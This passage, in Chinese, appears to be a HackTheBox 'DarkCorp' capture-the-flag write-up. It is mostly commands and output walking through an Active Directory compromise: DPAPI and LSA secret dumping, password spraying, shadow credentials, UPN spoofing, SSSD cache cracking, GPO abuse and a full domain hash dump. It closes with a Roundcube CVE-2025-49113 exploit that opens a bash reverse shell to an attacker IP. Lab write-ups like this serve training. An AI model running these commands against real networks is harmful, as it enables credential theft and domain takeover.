[*] Dumping cached domain logon information (domain/username:hash)
DARKCORP.HTB/svc_acc:$DCC2$10240#svc_acc#3a5485946a63220d3c4b118b36361dbb: (2026-01-19 04:38:06+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
darkcorp\WEB-01$:plain_password_hex:4100520044006c002600710072005a00640022007400230061003d004f00520063005e006b006e004f005d00270034004b0041003a003900390074006200320031006a0040005a004f004f005c004b003b00760075006600210063004f0075002f003c0072005d0043004c004a005800250075006c002d00440064005f006b00380038002c00270049002c0046004000680027003b004500200021003b0042004d005f0064003b0066002300700068005500440069002f0054002300320022005f004c0056004c003c0049006f002600480076002c005d00610034005500470077004a0076005f003400740054004800
darkcorp\WEB-01$:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1004cecdc9b33080d25a4a29126d4590eb555c5f
dpapi_userkey:0x7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
[*] NL$KM
0000 DD C9 21 14 B9 23 69 1B D8 BE FD 57 6B 3C 3E E1 ..!..#i....Wk<>.
0010 9D 3D 3F 74 82 AF 75 33 FD 74 61 6E B7 24 55 AF .=?t..u3.tan.$U.
0020 6F 61 A0 BC 2B 2A 86 CF 6E EC E0 D3 37 98 FE E5 oa..+*..n...7...
0030 14 54 7D A9 A6 45 19 37 F1 20 24 4B 18 43 19 72 .T}..E.7. $K.C.r
NL$KM:ddc92114b923691bd8befd576b3c3ee19d3d3f7482af7533fd74616eb72455af6f61a0bc2b2a86cf6eece0d33798fee514547da9a6451937f120244b18431972
[*] Cleaning up...
[*] Stopping service RemoteRegistry
看看dpapi
2.1.2. DPAPI
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.2 -k --use-kcache --dpapi
SMB 172.16.20.2 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB 172.16.20.2 445 WEB-01 [+] DARKCORP.HTB\administrator from ccache (Pwn3d!)
SMB 172.16.20.2 445 WEB-01 [*] Collecting DPAPI masterkeys, grab a coffee and be patient...
SMB 172.16.20.2 445 WEB-01 [+] Got 6 decrypted masterkeys. Looting secrets...
SMB 172.16.20.2 445 WEB-01 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!
可以获取到本地管理员的明文密码But_Lying_Aid9!
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.2 -u administrator -p 'But_Lying_Aid9!' --local-auth
SMB 172.16.20.2 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:WEB-01) (signing:False) (SMBv1:None)
SMB 172.16.20.2 445 WEB-01 [+] WEB-01\administrator:But_Lying_Aid9! (Pwn3d!)2.1.3. 密码喷洒
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -k --use-kcache --rid-brute
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] DARKCORP.HTB\web-01$ from ccache
SMB 172.16.20.1 445 DC-01 498: darkcorp\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 500: darkcorp\Administrator (SidTypeUser)
SMB 172.16.20.1 445 DC-01 501: darkcorp\Guest (SidTypeUser)
SMB 172.16.20.1 445 DC-01 502: darkcorp\krbtgt (SidTypeUser)
SMB 172.16.20.1 445 DC-01 512: darkcorp\Domain Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 513: darkcorp\Domain Users (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 514: darkcorp\Domain Guests (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 515: darkcorp\Domain Computers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 516: darkcorp\Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 517: darkcorp\Cert Publishers (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 518: darkcorp\Schema Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 519: darkcorp\Enterprise Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 520: darkcorp\Group Policy Creator Owners (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 521: darkcorp\Read-only Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 522: darkcorp\Cloneable Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 525: darkcorp\Protected Users (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 526: darkcorp\Key Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 527: darkcorp\Enterprise Key Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 553: darkcorp\RAS and IAS Servers (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 571: darkcorp\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 572: darkcorp\Denied RODC Password Replication Group (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 1000: darkcorp\DC-01$ (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1101: darkcorp\DnsAdmins (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 1102: darkcorp\DnsUpdateProxy (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 1103: darkcorp\victor.r (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1104: darkcorp\svc_acc (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1105: darkcorp\john.w (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1106: darkcorp\angela.w (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1107: darkcorp\angela.w.adm (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1108: darkcorp\taylor.b (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1109: darkcorp\linux_admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 1110: darkcorp\gpo_manager (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 1601: darkcorp\DRIP$ (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -u valid_user.txt -p But_Lying_Aid9!
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Administrator:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Guest:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\krbtgt:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\DC-01$:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\victor.r:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\svc_acc:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\john.w:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\angela.w:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\angela.w.adm:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\taylor.b:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\DRIP$:But_Lying_Aid9! STATUS_LOGON_FAILURE
没有有效的用户
2.1.4. 解密blob
因为我们有了这个明文密码,可以尝试解密一下主密钥看看
获取主密钥
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# impacket-dpapi masterkey -file 6037d071-cac5-481e-9e08-c4296c0a7ff7 -sid S-1-5-21-2988385993-1727309239-2541228647-500 -password 'But_Lying_Aid9!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 6037d071-cac5-481e-9e08-c4296c0a7ff7
Flags : 5 (5)
Policy : 0 (0)
MasterKeyLen: 000000b0 (176)
BackupKeyLen: 00000090 (144)
CredHistLen : 00000014 (20)
DomainKeyLen: 00000000 (0)
Decrypted key with User Key (SHA1)
Decrypted key: 0xac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da
解密Blob
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# impacket-dpapi credential -file 32B2774DF751FF7E28E78AE75C237A1E -key 0xac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-16 19:01:39+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : LegacyGeneric:target=WEB-01
Description : Updated by: Administrator on: 1/16/2025
Unknown :
>>>> Username : Administrator
>>>> Unknown : Pack_Beneath_Solid9!
又获取到一个密码
使用这个密码进行喷洒可以发现其可以认证到john.w用户
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -u valid_user.txt -p 'Pack_Beneath_Solid9!'
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Administrator:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Guest:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\krbtgt:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\DC-01$:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\victor.r:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\svc_acc:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\john.w:Pack_Beneath_Solid9!
2.2. shell as ANGELA.W
因为john对angela.w有GenericWrite权限,且存在ADCS ,所以可以进行Shadow Credentials
2.2.1. shadow credential
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# certipy shadow auto -k -no-pass -dc-ip '172.16.20.1' -target DC-01.darkcorp.htb -dc-host DC-01.darkcorp.htb -account 'angela.w'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting user 'angela.w'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '13b9bb7679344b2380e0785ed8938b32'
[*] Adding Key Credential with device ID '13b9bb7679344b2380e0785ed8938b32' to the Key Credentials for 'angela.w'
[*] Successfully added Key Credential with device ID '13b9bb7679344b2380e0785ed8938b32' to the Key Credentials for 'angela.w'
[*] Authenticating as 'angela.w' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'angela.w@darkcorp.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'angela.w.ccache'
[*] Wrote credential cache to 'angela.w.ccache'
[*] Trying to retrieve NT hash for 'angela.w'
[*] Restoring the old Key Credentials for 'angela.w'
[*] Successfully restored the old Key Credentials for 'angela.w'
[*] NT hash for 'angela.w': 957246c8137069bca672dc6aa0af7c7a
2.3. shell as Linux root
angela.w 的出站访问没有啥有用的东西
但是angela.w.adm是属于 Linux Admin组里面的
他可以管理Linux SSSD
我认为我下一步很可能就是获取这个用户的权限
2.3.1. UPN Spoofing
参考0xdf的wp得知此处可以进行UPN Spoofing
https://www.pentestpartners.com/security-blog/a-broken-marriage-abusing-mixed-vendor-kerberos-stacks/
首先利用john.w的权限修改angela.w的UPN为angela.w.adm
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# bloodyAD -u john.w -k --dc-ip 172.16.20.1 --host DC-01.darkcorp.htb -d darkcorp.htb set object angela.w userPrincipalName -v angela.w.adm
[+] angela.w's userPrincipalName has been updated
然后获取一个NT_ENTERPRISE 类型的 tgt ,让其优先处理userPrincipalName属性而不是samAccountName属性
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# impacket-getTGT -hashes :957246c8137069bca672dc6aa0af7c7a -principalType 'NT_ENTERPRISE' darkcorp.htb/angela.w.adm
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in angela.w.adm.ccache
上传这个tgt到linux,然后使用ksu认证切换到angela.w.adm用户
ebelford@drip:/tmp$ KRB5CCNAME=angela.w.adm.ccache ksu angela.w.adm
Authenticated angela.w.adm@DARKCORP.HTB
Account angela.w.adm: authorization for angela.w.adm@DARKCORP.HTB successful
Changing uid to angela.w.adm (1730401107)
angela.w.adm@drip:/tmp$ whoami
angela.w.adm
angela.w.adm@drip:/tmp$ sudo -l
Matching Defaults entries for angela.w.adm on drip:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User angela.w.adm may run the following commands on drip:
>>>> (ALL : ALL) NOPASSWD: ALL
angela.w.adm 可以用sudo执行任何命令
2.4. shell as taylor.b.adm
2.4.1. krb5.keytab
查看/etc/krb5.keytab
可以解密出当前机器的DRIP$的hash
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : DARKCORP.HTB
SERVICE PRINCIPAL : DRIP$/
NTLM HASH : da20dd3cee2b5dee8b941a4d6d5010da
AES-256 HASH : 7c7ee0dfc75cfbf24039d50ccfc2bc9a8534c563df07958cd1eff3698465b8d3
AES-128 HASH : 46f5a964a403ffd59868a3b93a04af35
但没什么用
2.4.2. cache_credentials
查看sssd.conf
root@drip:/tmp# cat /etc/sssd/sssd.conf
[sssd]
services = nss, pam
domains = darkcorp.htb
[domain/darkcorp.htb]
id_provider = ad
>>>> cache_credentials = True
auth_provider = ad
access_provider = simple
default_shell = /bin/bash
use_fully_qualified_names= False
krb5_store_password_if_offline = True
simple_allow_groups = linux_admins
发现其开启了凭据缓存,即只要登录过这台机器的域用户的凭据都会被缓存到本地的db中
SSSD 的缓存通常存在于 /var/lib/sss/db/ 目录下
root@drip:/var/lib/sss/db# ls -a
. .. cache_darkcorp.htb.ldb ccache_DARKCORP.HTB config.ldb sssd.ldb timestamps_darkcorp.htb.ldb
把他们保存到kali,然后使用ldbsearch 查看
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# ldbsearch -H cache_darkcorp.htb.ldb '(cachedPassword=*)'
asq: Unable to register control with rootdse!
# record 1
dn: name=taylor.b.adm@darkcorp.htb,cn=users,cn=darkcorp.htb,cn=sysdb
createTimestamp: 1736373877
fullName: Taylor Barnard ADM
gecos: Taylor Barnard ADM
gidNumber: 1730400513
name: taylor.b.adm@darkcorp.htb
objectCategory: user
uidNumber: 1730414101
objectSIDString: S-1-5-21-3432610366-2163336488-3604236847-14101
uniqueID: 6780d137-c4a5-49c2-9240-47ae051365c6
originalDN: CN=Taylor Barnard ADM,CN=Users,DC=darkcorp,DC=htb
originalMemberOf: CN=gpo_manager,CN=Users,DC=darkcorp,DC=htb
originalMemberOf: CN=linux_admins,CN=Users,DC=darkcorp,DC=htb
originalMemberOf: CN=Remote Management Users,CN=Builtin,DC=darkcorp,DC=htb
originalModifyTimestamp: 20250108215501.0Z
entryUSN: 118872
adAccountExpires: 9223372036854775807
adUserAccountControl: 66048
nameAlias: taylor.b.adm@darkcorp.htb
isPosix: TRUE
lastUpdate: 1736373877
initgrExpireTimestamp: 0
ccacheFile: FILE:/tmp/krb5cc_1730414101_B5njUL
>>>> cachedPassword:
cachedPasswordType: 1
lastCachedPasswordChange: 1736373912
failedLoginAttempts: 0
lastOnlineAuth: 1736373912
lastOnlineAuthWithCurrentToken: 1736373912
lastLogin: 1736373912
memberof: name=Domain Users@darkcorp.htb,cn=groups,cn=darkcorp.htb,cn=sysdb
memberof: name=linux_admins@darkcorp.htb,cn=groups,cn=darkcorp.htb,cn=sysdb
memberof: name=gpo_manager@darkcorp.htb,cn=groups,cn=darkcorp.htb,cn=sysdb
dataExpireTimestamp: 1
distinguishedName: name=taylor.b.adm@darkcorp.htb,cn=users,cn=darkcorp.htb,cn=
sysdb
# returned 1 records
# 1 entries
# 0 referrals
cachedPassword是一个sha-512加密的值
$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.:!QAZzaq1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQ...Nw7n5.
可以破解出其密码为!QAZzaq1
2.5. GPO Abuse
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# pygpoabuse.py 'darkcorp.htb/taylor.b.adm:!QAZzaq1' -gpo-id "652CAE9A-4BB7-49F2-9E52-3361F33CE786" -command 'net localgroup administrators taylor.b.adm /add' -f
SUCCESS:root:ScheduledTask TASK_247727e5 created!
[+] ScheduledTask TASK_247727e5 created!
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# nxc smb 172.16.20.1 -u taylor.b.adm -p '!QAZzaq1'
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\taylor.b.adm:!QAZzaq1 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# evil-winrm -i 172.16.20.1 -u taylor.b.adm -p '!QAZzaq1' ───────────
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> cd ../
*Evil-WinRM* PS C:\Users\taylor.b.adm> cd ../administrator
*Evil-WinRM* PS C:\Users\administrator> cd desktop
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
c5282b342aec6d4633b2be128b4a2cbe
reference:
3. hashes
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# impacket-secretsdump 'darkcorp.htb/taylor.b.adm:!QAZzaq1@dc-01'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fcb3ca5a19a1ccf2d14c13e8b64cde0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c032c3e2657f4554bc7af108bd5ef17:::
victor.r:1103:aad3b435b51404eeaad3b435b51404ee:06207752633f7509f8e2e0d82e838699:::
svc_acc:1104:aad3b435b51404eeaad3b435b51404ee:01f55ea10774cce781a1b172478fcd25:::
john.w:1105:aad3b435b51404eeaad3b435b51404ee:b31090fdd33a4044cd815558c4d05b04:::
angela.w:1106:aad3b435b51404eeaad3b435b51404ee:957246c8137069bca672dc6aa0af7c7a:::
angela.w.adm:1107:aad3b435b51404eeaad3b435b51404ee:cf8b05d0462fc44eb783e3f423e2a138:::
taylor.b:1108:aad3b435b51404eeaad3b435b51404ee:ab32e2ad1f05dab03ee4b4d61fcb84ab:::
taylor.b.adm:14101:aad3b435b51404eeaad3b435b51404ee:0577b4b3fb172659dbac0be4554610f8:::
darkcorp.htb\eugene.b:25601:aad3b435b51404eeaad3b435b51404ee:84d9acc39d242f951f136a433328cf83:::
darkcorp.htb\bryce.c:25603:aad3b435b51404eeaad3b435b51404ee:5aa8484c54101e32418a533ad956ca60:::
DC-01$:1000:aad3b435b51404eeaad3b435b51404ee:45d397447e9d8a8c181655c27ef31d28:::
DRIP$:1601:aad3b435b51404eeaad3b435b51404ee:da20dd3cee2b5dee8b941a4d6d5010da:::
WEB-01$:20601:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:97064b5e2ed9569a7a61cb6e71fd624e20de8464fc6d3f7f9c9ccd5ec865cd05
Administrator:aes128-cts-hmac-sha1-96:0424167c3041ed3b8df4ab1c996690c1
Administrator:des-cbc-md5:a1b004ad46dc19d9
krbtgt:aes256-cts-hmac-sha1-96:2795479225a152c8958119e8549079f2a59e101d84a3e464603a9cced55580d6
krbtgt:aes128-cts-hmac-sha1-96:183ebcd77ae33f476eb13c3f4404b98d
krbtgt:des-cbc-md5:7fe9e5ad67524001
victor.r:aes256-cts-hmac-sha1-96:84e79cb6b8959ebdda0dc73d2c6728bb9664d0d75c2aef702b0ea0a4126570bb
victor.r:aes128-cts-hmac-sha1-96:bc1fa04172b62be4428af05dcd4941af
victor.r:des-cbc-md5:62491fa740918316
svc_acc:aes256-cts-hmac-sha1-96:21ebfe2a41e5d614795ef004a06135748d5af03d0f2ca7fd6f6d804ac00f759a
svc_acc:aes128-cts-hmac-sha1-96:aebdba02d03943f17f553495f5f5e1d1
svc_acc:des-cbc-md5:5bec0bb54a405ed9
john.w:aes256-cts-hmac-sha1-96:6c0d89a7461f21150bbab0e4c9dea04ca4feb27a4f432c95030dbfa17f4f7de5
john.w:aes128-cts-hmac-sha1-96:16da7304c10a476b10a0ad301f858826
john.w:des-cbc-md5:e90b041f52b30875
angela.w:aes256-cts-hmac-sha1-96:25f7053fcfb74cf4f02dab4b2c7cb1ae506f3c3c09e4a5b7229b9f21a761830a
angela.w:aes128-cts-hmac-sha1-96:15f1467015c7cdd49ef74fd2fe549cf3
angela.w:des-cbc-md5:5b0168dacbc22a5e
angela.w.adm:aes256-cts-hmac-sha1-96:bec3236552b087f396597c10431e9a604be4b22703d37ae45cde6cd99873c693
angela.w.adm:aes128-cts-hmac-sha1-96:994dccb881c6a80c293cac8730fd18a2
angela.w.adm:des-cbc-md5:cb0268169289bfd9
taylor.b:aes256-cts-hmac-sha1-96:b269239174e6de5c93329130e77143d7a560f26938c06dae8b82cae17afb809c
taylor.b:aes128-cts-hmac-sha1-96:a3f7e9307519e6d3cc8e4fba83df0fef
taylor.b:des-cbc-md5:9b8010a21f1c7a3d
taylor.b.adm:aes256-cts-hmac-sha1-96:4c1e6783666861aac09374bee2bc48ba5ad331f3ac87e067c4a330c6a31dd71a
taylor.b.adm:aes128-cts-hmac-sha1-96:85712fd85df4669be88350520651cfe2
taylor.b.adm:des-cbc-md5:ce6176f4f4e5cd9e
darkcorp.htb\eugene.b:aes256-cts-hmac-sha1-96:33e0cf90ad3c5d0cd264207421c506b56b8ca9703b5be8c58a97169851067fd1
darkcorp.htb\eugene.b:aes128-cts-hmac-sha1-96:adf8b2743349be9684f8ec27df53fa92
darkcorp.htb\eugene.b:des-cbc-md5:2f5ef4b06b231afd
darkcorp.htb\bryce.c:aes256-cts-hmac-sha1-96:e835ec6b7d680472bdf65ac11ec17395930b5d778ba08481ef7290616b1fa7a8
darkcorp.htb\bryce.c:aes128-cts-hmac-sha1-96:09b1a46858723452ce11da2335b602b0
darkcorp.htb\bryce.c:des-cbc-md5:26d55b5849b6e623
DC-01$:aes256-cts-hmac-sha1-96:23f8c53f91fd2035d0dc5163341bd883cc051c1ba998f5aed318cd0d820fa1b2
DC-01$:aes128-cts-hmac-sha1-96:2715a4681263d6f9daf03b7dd7065a23
DC-01$:des-cbc-md5:8038f74f7c0da1b5
DRIP$:aes256-cts-hmac-sha1-96:7c7ee0dfc75cfbf24039d50ccfc2bc9a8534c563df07958cd1eff3698465b8d3
DRIP$:aes128-cts-hmac-sha1-96:46f5a964a403ffd59868a3b93a04af35
DRIP$:des-cbc-md5:d63120381a62dcc4
WEB-01$:aes256-cts-hmac-sha1-96:f16448747d7df00ead462e40b26561ba01be87d83068ef0ed766ec8e7dd2a12e
WEB-01$:aes128-cts-hmac-sha1-96:7867cb5a59da118ad045a5da54039eae
WEB-01$:des-cbc-md5:38e00bb3d901eaef
[*] Cleaning up...
4. Beyond Root
4.1. CVE-2025-49113
CVE-2025-49113 是一个针对roundcube before 1.5.10 and 1.6.x before 1.6.11的RCE漏洞
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/CVE-2025-49113-exploit]
└─# php CVE-2025-49113.php http://mail.drip.htb admin admin 'bash -c "bash -i >& /dev/tcp/10.10.14.86/4444 0>&1"'
[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10607
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...
──────────────────────────────────────────────────────────────────────────────────────────
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.86] from (UNKNOWN) [10.129.232.7] 63910
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
www-data@drip:/$ whoami
whoami
www-data
www-data@drip:/$
在 Linux/Windows 上发送原始 ICMP 包(Ping)通常需要 Raw Sockets 权限
低权限 Agent 往往没有CAP_NET_RAW(Linux)或管理员权限(Windows),因此无法构造 ICMP 报文↩︎